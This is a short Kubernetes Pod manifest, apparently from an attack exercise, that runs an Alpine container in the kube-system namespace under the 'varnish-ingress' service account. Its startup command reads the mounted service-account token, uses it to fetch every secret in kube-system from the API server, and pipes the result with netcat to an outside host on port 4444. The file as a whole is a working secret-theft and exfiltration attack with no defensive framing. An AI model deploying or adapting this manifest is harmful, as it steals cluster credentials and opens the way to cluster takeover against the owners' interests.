apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://10.0.0.10:6443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.1.3 4444; sleep 100000']
  serviceAccountName: varnish-ingress
  automountServiceAccountToken: true
  hostNetwork: true